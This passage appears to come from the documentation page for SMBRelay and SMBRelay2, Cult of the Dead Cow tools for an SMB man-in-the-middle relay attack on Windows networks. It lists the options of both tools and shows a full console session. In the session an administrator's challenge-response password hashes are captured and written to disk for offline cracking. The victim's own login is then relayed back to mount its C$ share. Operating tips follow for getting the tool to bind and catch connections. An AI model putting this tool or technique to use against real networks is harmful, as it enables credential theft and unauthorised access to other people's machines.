usable by L0phtcrack so the passwords can be cracked later.

```text
Usage: smbrelay [options]
Options:
/D num   - Set debug level, current valid levels: 0 (none), 1, 2
           Defaults to 0
/E       - Enumerates interfaces and their indexes
/F[-]    - Fake server only, capture password hashes and do not relay
           Use - to disable acting as a fake server if relay fails
/IL num  - Set the interface index to use when adding local IP addresses
/IR num  - Set the interface index to use when adding relay IP addresses
           Defaults to 1. Use /E to display the adapter indexes
/L[+] IP - Set the local IP to listen on for incoming NetBIOS connections
           Use + to first add the IP address to the NIC
           Defaults to primary host IP
/R[-] IP - Set the starting relay IP address to use
           Use - to NOT first add each relay IP address to the NIC
           Defaults to 192.1.1.1
/S name  - Set the source machine name
           Defaults to CDC4EVER
/T IP    - Connect to target IP instead of back to the incoming address
```

```text
c:\>smbrelay /I 2 /D 1

SMBRelay v0.98 - TCP (NetBT) level SMB man-in-the-middle relay attack
Copyright 2001: Sir Dystic, Cult of the Dead Cow
Send complaints, ideas and donations to sirdystic@cultdeadcow.com
Bound to port 139 on address 11.11.11.11
Connection from 60.61.62.63:1140
Request type: Session Request 72 bytes
Source name: BOB <00>
Target name: *SMBSERVER <20>
Setting target name to source name and source name to 'CDC4EVER'...Response:
Positive Session Response 4 bytes

Request type: Session Message 174 bytes
SMB_COM_NEGOTIATE
Response: Session Message 99 bytes
Challenge (8 bytes): 268B11C361473D20

Request type: Session Message 278 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password: 59A8A04CC37D226F0AC44065C84FDF9FEB1BB611C3CBE936
Case sensitive password: 8BA548AF1F9A517BBFBEF4E53D1D8B5D94E81C5523E7B251
Username: "administrator"
Domain: "BOB"
OS: "Windows NT 1381"
Lanman type: ""
Response: Session Message 148 bytes
OS: "Windows NT 4.0"
Lanman type: "NT LAN Manager 4.0"
Domain: "BOBSMITH"
Password hash written to disk
Connected?
Bound to port 139 on address 192.1.1.1 relaying for host BOB 60.61.62.63
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
D:\>net use \\192.1.1.1
The command completed successfully.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

*** Relay connection for target BOB received from 11.11.11.11:1472
Relay request type: Session Request 72 bytes, 72 target BOB
*** Sent positive session response for relay target BOB
Relay request type: Session Message 174 bytes, 174 target BOB
BOB:SMB_COM_NEGOTIATE 174 bytes
0 - Dialect 2 - PC NETWORK PROGRAM 1.0
1 - Dialect 2 - XENIX CORE
2 - Dialect 2 - MICROSOFT NETWORKS 1.03
3 - Dialect 2 - LANMAN1.0
4 - Dialect 2 - Windows for Workgroups 3.1a
5 - Dialect 2 - LM1.2X002
6 - Dialect 2 - LANMAN2.1
*** Sent dialect selection response (7) for target BOB
Relay request type: Session Message 260 bytes, 260 target BOB
BOB:SMB_COM_SESSION_SETUP_ANDX 260 bytes
*** Sent SMB Session setup response for relay to BOB
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
D:\>net use z: \\192.1.1.1\c$
The command completed successfully.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Relay request type: Session Message 136 bytes, 136 target BOB
BOB:SMB_COM_SESSION_SETUP_ANDX 136 bytes
Received 132 byte response from target BOB
Relay request type: Session Message 81 bytes, 81 target BOB
BOB:SMB_COM_TREE_CONNECT_ANDX 81 bytes
Received 56 byte response from target BOB
Received request header, expecting 4 bytes for target BOB
Relay request type: Session Keep Alive 4 bytes, 4 target BOB

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
D:\>net use * /d /y
The command completed successfully.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Relay request type: Session Message 39 bytes, 39 target BOB
BOB:SMB_COM_TREE_DISCONNECT 39 bytes
Received 39 byte response from target BOB
Relay request type: Session Message 39 bytes, 39 target BOB
BOB:SMB_COM_TREE_DISCONNECT 39 bytes
Received 39 byte response from target BOB
Relay request type: Session Message 43 bytes, 43 target BOB
BOB:SMB_COM_LOGOFF_ANDX 43 bytes
*** Logoff from target BOB
*** Relay disconnected from target BOB
Bound to port 139 on address 192.1.1.1 relaying for host BOB 60.61.62.63
Deleted relay IP address 192.1.1.1 for target BOB
*** Target BOB Disconnected
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
```

Notes on using SMBRelay:

SMBRelay must first bind to port 139 to receive the incoming NetBIOS connections. First of all, because this port is below 1024 it is a privileged port and requires administrator access to use. Administrator access is also required to add and remove IP addresses, which SMBRelay does in its normal mode of operation. So SMBRELAY MUST RUN AS AN ADMINISTRATOR ACCESS ACCOUNT.

SMBRelay targets and runs best on Windows NT and 2000 machines. Connections from 9x and ME
boxes will have unpredictable results.

On Win2K SMBRelay will not be able to bind to port 139 if the system is already using it because of a
new socket flag Microsoft added to specifically prevent other applications from re-using a port the
system is using. The easiest thing to do is to use the /L+ option to create a new IP address on your NIC
and have the target connect to that address rather than your primary. Another way is to manually add a
new IP address through your control panel and then use /L to specify that address.

SMBRelay will bind in front of the OS on port 139 if it can, but just because it is able to bind
successfully doesn't mean that the program will actually receive the incoming connections. If there are
any existing connections to the system (even in the TIME_WAIT state) when SMBRelay binds to the
port, it will probably not receive any of the connections. Under Windows 98 it never seems to receive
any connections. Under Windows NT, even under best circumstances it only sometimes receives the
connections. Because of this, I usually run several copies of SMBRelay, hopefully increasing the
chances of SMBRelay getting the connections instead of the system. Under Windows 2000 the OS
prevents SMBRelay from binding to the port while the OS is using it.

To create a new IP address on your computer, you must specify the interface index of the adapter to
use using the /IR and/or /IL options. Use /E to list the interface indexes available. Under NT the
indexes are nice simple numbers, but under 2K they use high bits so the indexes are represented as
hex numbers. If you do not use the /IR option to set the relay interface it will default to 1, which is
usually the loopback interface. This will allow you to connect only from your own box.

SMBRelay should run on an NT or 2K box, but MAY run on a 98 box if it is configured correctly.

However, the relaying may not work for a 98 box.

The FIRST thing that must be done to connect to the relay address is:

```text
NET USE \\192.1.1.1
```

After that you can do anything else to the target directly through Windows networking using the relay IP address host name (like `\\192.1.1.1`).
[SMBRelay Win32 source And Binary]

SMBRelay2

SMBRelay2 works at the NetBIOS level, and should work across any protocol NetBIOS is bound to (such as NetBEUI or TCP/IP). Rather than using IP addresses, SMBRelay2 uses NetBIOS names. It also supports mitm'ing to a third host. However, it currently supports listening on only one name (the local name, LocalName), so the target must attempt to access a resource on LocalName for SMBRelay2 to operate.

```text
SMBRelay2 [Options]
Options:
/A LanaNum    - Use LanaNum
                Defaults to 0
/D DebugLevel - Level of debug messages, valid levels 0 - 3
                Defaults to 0
/L LocalName  - Listen for primary connection on LocalName
                Defaults to SERVER
/R RelayName  - Listen for relay connection on RelayName
                Defaults to RELAY
/S SourceName - Use SourceName when connecting to target
                Defaults to CDC4EVER
/T TargetName - Connect to TargetName for relay
                Defaults to connecting back to client
```
[SMBRelay2 Win32 source And Binary]
Digital Underground
